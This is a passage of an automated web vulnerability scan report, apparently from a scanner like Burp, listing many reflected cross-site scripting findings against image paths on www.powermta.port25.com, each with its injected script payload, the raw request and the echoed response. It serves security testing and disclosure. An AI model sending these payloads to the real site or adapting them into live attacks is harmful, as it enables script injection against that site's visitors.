Request
GET /wp-contentba96c"><script>alert(1)</script>dd2e31bf684 /themes/powermta1/images/headerimg.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-contentba96c\"><script>alert(1)</script>dd2e31bf684 /themes/powermta1/images/headerimg.jpg" />...[SNIP]...
2.66. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/headerimg.jpg
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67faa"><script>alert(1)</script>542006ac710 was submitted in the REST URL parameter 2. This input was echoed as 67faa\"><script>alert(1)</script>542006ac710 in the application's response.
Request
GET /wp-content/themes67faa"><script>alert(1)</script>542006ac710 /powermta1/images/headerimg.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes67faa\"><script>alert(1)</script>542006ac710 /powermta1/images/headerimg.jpg" />...[SNIP]...
2.67. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/headerimg.jpg
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af731"><script>alert(1)</script>b2789fef605 was submitted in the REST URL parameter 3. This input was echoed as af731\"><script>alert(1)</script>b2789fef605 in the application's response.
Request
GET /wp-content/themes/powermta1af731"><script>alert(1)</script>b2789fef605 /images/headerimg.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1af731\"><script>alert(1)</script>b2789fef605 /images/headerimg.jpg" />...[SNIP]...
2.68. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/headerimg.jpg
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef81"><script>alert(1)</script>10358b11286 was submitted in the REST URL parameter 4. This input was echoed as 9ef81\"><script>alert(1)</script>10358b11286 in the application's response.
Request
GET /wp-content/themes/powermta1/images9ef81"><script>alert(1)</script>10358b11286 /headerimg.jpg HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images9ef81\"><script>alert(1)</script>10358b11286 /headerimg.jpg" />...[SNIP]...
2.69. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/headerimg.jpg
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c269"><script>alert(1)</script>cab1a636d58 was submitted in the REST URL parameter 5. This input was echoed as 6c269\"><script>alert(1)</script>cab1a636d58 in the application's response.
Request
GET /wp-content/themes/powermta1/images/headerimg.jpg6c269"><script>alert(1)</script>cab1a636d58 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/headerimg.jpg6c269\"><script>alert(1)</script>cab1a636d58 " />...[SNIP]...
2.70. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/headerimg.jpg
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d4bf"><script>alert(1)</script>e08f7b7f256 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d4bf\"><script>alert(1)</script>e08f7b7f256 in the application's response.
Request
GET /wp-content/themes/powermta1/images/headerimg.jpg?4d4bf"><script>alert(1)</script>e08f7b7f256 =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/headerimg.jpg?4d4bf\"><script>alert(1)</script>e08f7b7f256 =1" />...[SNIP]...
2.71. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/in-logo.gif
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed2fb"><script>alert(1)</script>8e7c7e2ee42 was submitted in the REST URL parameter 1. This input was echoed as ed2fb\"><script>alert(1)</script>8e7c7e2ee42 in the application's response.
Request
GET /wp-contented2fb"><script>alert(1)</script>8e7c7e2ee42 /themes/powermta1/images/in-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-contented2fb\"><script>alert(1)</script>8e7c7e2ee42 /themes/powermta1/images/in-logo.gif" />...[SNIP]...
2.72. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/in-logo.gif
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af46d"><script>alert(1)</script>84649906211 was submitted in the REST URL parameter 2. This input was echoed as af46d\"><script>alert(1)</script>84649906211 in the application's response.
Request
GET /wp-content/themesaf46d"><script>alert(1)</script>84649906211 /powermta1/images/in-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themesaf46d\"><script>alert(1)</script>84649906211 /powermta1/images/in-logo.gif" />...[SNIP]...
2.73. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/in-logo.gif
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 233f0"><script>alert(1)</script>a3644243ffa was submitted in the REST URL parameter 3. This input was echoed as 233f0\"><script>alert(1)</script>a3644243ffa in the application's response.
Request
GET /wp-content/themes/powermta1233f0"><script>alert(1)</script>a3644243ffa /images/in-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1233f0\"><script>alert(1)</script>a3644243ffa /images/in-logo.gif" />...[SNIP]...
2.74. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/in-logo.gif
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8744"><script>alert(1)</script>1682fc29106 was submitted in the REST URL parameter 4. This input was echoed as b8744\"><script>alert(1)</script>1682fc29106 in the application's response.
Request
GET /wp-content/themes/powermta1/imagesb8744"><script>alert(1)</script>1682fc29106 /in-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/imagesb8744\"><script>alert(1)</script>1682fc29106 /in-logo.gif" />...[SNIP]...
2.75. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/in-logo.gif
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e260"><script>alert(1)</script>6d48c521d4 was submitted in the REST URL parameter 5. This input was echoed as 3e260\"><script>alert(1)</script>6d48c521d4 in the application's response.
Request
GET /wp-content/themes/powermta1/images/in-logo.gif3e260"><script>alert(1)</script>6d48c521d4 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/in-logo.gif3e260\"><script>alert(1)</script>6d48c521d4 " />...[SNIP]...
2.76. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/in-logo.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff5b6"><script>alert(1)</script>8277b2e200f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff5b6\"><script>alert(1)</script>8277b2e200f in the application's response.
Request
GET /wp-content/themes/powermta1/images/in-logo.gif?ff5b6"><script>alert(1)</script>8277b2e200f =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/in-logo.gif?ff5b6\"><script>alert(1)</script>8277b2e200f =1" />...[SNIP]...
2.77. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/phone-number.gif
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81600"><script>alert(1)</script>a1045f287d9 was submitted in the REST URL parameter 1. This input was echoed as 81600\"><script>alert(1)</script>a1045f287d9 in the application's response.
Request
GET /wp-content81600"><script>alert(1)</script>a1045f287d9 /themes/powermta1/images/phone-number.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content81600\"><script>alert(1)</script>a1045f287d9 /themes/powermta1/images/phone-number.gif" />...[SNIP]...
2.78. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/phone-number.gif
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6162"><script>alert(1)</script>e459bfdeccf was submitted in the REST URL parameter 2. This input was echoed as f6162\"><script>alert(1)</script>e459bfdeccf in the application's response.
Request
GET /wp-content/themesf6162"><script>alert(1)</script>e459bfdeccf /powermta1/images/phone-number.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themesf6162\"><script>alert(1)</script>e459bfdeccf /powermta1/images/phone-number.gif" />...[SNIP]...
2.79. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/phone-number.gif
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16bec"><script>alert(1)</script>49a5a483616 was submitted in the REST URL parameter 3. This input was echoed as 16bec\"><script>alert(1)</script>49a5a483616 in the application's response.
Request
GET /wp-content/themes/powermta116bec"><script>alert(1)</script>49a5a483616 /images/phone-number.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta116bec\"><script>alert(1)</script>49a5a483616 /images/phone-number.gif" />...[SNIP]...
2.80. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/phone-number.gif
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6c8"><script>alert(1)</script>64ba8a9e6fa was submitted in the REST URL parameter 4. This input was echoed as 1e6c8\"><script>alert(1)</script>64ba8a9e6fa in the application's response.
Request
GET /wp-content/themes/powermta1/images1e6c8"><script>alert(1)</script>64ba8a9e6fa /phone-number.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images1e6c8\"><script>alert(1)</script>64ba8a9e6fa /phone-number.gif" />...[SNIP]...
2.81. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/phone-number.gif
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e4cb"><script>alert(1)</script>2e92d43359e was submitted in the REST URL parameter 5. This input was echoed as 5e4cb\"><script>alert(1)</script>2e92d43359e in the application's response.
Request
GET /wp-content/themes/powermta1/images/phone-number.gif5e4cb"><script>alert(1)</script>2e92d43359e HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/phone-number.gif5e4cb\"><script>alert(1)</script>2e92d43359e " />...[SNIP]...
2.82. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/phone-number.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdc3"><script>alert(1)</script>8d0bfc23fd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fdc3\"><script>alert(1)</script>8d0bfc23fd4 in the application's response.
Request
GET /wp-content/themes/powermta1/images/phone-number.gif?8fdc3"><script>alert(1)</script>8d0bfc23fd4 =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/phone-number.gif?8fdc3\"><script>alert(1)</script>8d0bfc23fd4 =1" />...[SNIP]...
2.83. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a028"><script>alert(1)</script>3b4c3247182 was submitted in the REST URL parameter 1. This input was echoed as 5a028\"><script>alert(1)</script>3b4c3247182 in the application's response.
Request
GET /wp-content5a028"><script>alert(1)</script>3b4c3247182 /themes/powermta1/images/powerMTA-footer-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content5a028\"><script>alert(1)</script>3b4c3247182 /themes/powermta1/images/powerMTA-footer-logo.png" />...[SNIP]...
2.84. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b39d"><script>alert(1)</script>9c12b31a716 was submitted in the REST URL parameter 2. This input was echoed as 9b39d\"><script>alert(1)</script>9c12b31a716 in the application's response.
Request
GET /wp-content/themes9b39d"><script>alert(1)</script>9c12b31a716 /powermta1/images/powerMTA-footer-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes9b39d\"><script>alert(1)</script>9c12b31a716 /powermta1/images/powerMTA-footer-logo.png" />...[SNIP]...
2.85. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ded"><script>alert(1)</script>d4e70ecc70f was submitted in the REST URL parameter 3. This input was echoed as 53ded\"><script>alert(1)</script>d4e70ecc70f in the application's response.
Request
GET /wp-content/themes/powermta153ded"><script>alert(1)</script>d4e70ecc70f /images/powerMTA-footer-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta153ded\"><script>alert(1)</script>d4e70ecc70f /images/powerMTA-footer-logo.png" />...[SNIP]...
2.86. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb663"><script>alert(1)</script>cffd464704f was submitted in the REST URL parameter 4. This input was echoed as eb663\"><script>alert(1)</script>cffd464704f in the application's response.
Request
GET /wp-content/themes/powermta1/imageseb663"><script>alert(1)</script>cffd464704f /powerMTA-footer-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/imageseb663\"><script>alert(1)</script>cffd464704f /powerMTA-footer-logo.png" />...[SNIP]...
2.87. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27473"><script>alert(1)</script>4663a66e2c0 was submitted in the REST URL parameter 5. This input was echoed as 27473\"><script>alert(1)</script>4663a66e2c0 in the application's response.
Request
GET /wp-content/themes/powermta1/images/powerMTA-footer-logo.png27473"><script>alert(1)</script>4663a66e2c0 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png27473\"><script>alert(1)</script>4663a66e2c0 " />...[SNIP]...
2.88. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fce9"><script>alert(1)</script>544beb43723 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fce9\"><script>alert(1)</script>544beb43723 in the application's response.
Request
GET /wp-content/themes/powermta1/images/powerMTA-footer-logo.png?9fce9"><script>alert(1)</script>544beb43723 =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png?9fce9\"><script>alert(1)</script>544beb43723 =1" />...[SNIP]...
2.89. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-logo.png
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fcd5"><script>alert(1)</script>b939ce7cc9f was submitted in the REST URL parameter 1. This input was echoed as 1fcd5\"><script>alert(1)</script>b939ce7cc9f in the application's response.
Request
GET /wp-content1fcd5"><script>alert(1)</script>b939ce7cc9f /themes/powermta1/images/powerMTA-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content1fcd5\"><script>alert(1)</script>b939ce7cc9f /themes/powermta1/images/powerMTA-logo.png" />...[SNIP]...
2.90. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-logo.png
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1c99"><script>alert(1)</script>88b9a6b78db was submitted in the REST URL parameter 2. This input was echoed as a1c99\"><script>alert(1)</script>88b9a6b78db in the application's response.
Request
GET /wp-content/themesa1c99"><script>alert(1)</script>88b9a6b78db /powermta1/images/powerMTA-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themesa1c99\"><script>alert(1)</script>88b9a6b78db /powermta1/images/powerMTA-logo.png" />...[SNIP]...
2.91. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-logo.png
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce397"><script>alert(1)</script>60af3aed6e8 was submitted in the REST URL parameter 3. This input was echoed as ce397\"><script>alert(1)</script>60af3aed6e8 in the application's response.
Request
GET /wp-content/themes/powermta1ce397"><script>alert(1)</script>60af3aed6e8 /images/powerMTA-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1ce397\"><script>alert(1)</script>60af3aed6e8 /images/powerMTA-logo.png" />...[SNIP]...
2.92. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/powerMTA-logo.png
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ecd5"><script>alert(1)</script>c0cab668d12 was submitted in the REST URL parameter 4. This input was echoed as 9ecd5\"><script>alert(1)</script>c0cab668d12 in the application's response.
Request
GET /wp-content/themes/powermta1/images9ecd5"><script>alert(1)</script>c0cab668d12 /powerMTA-logo.png HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
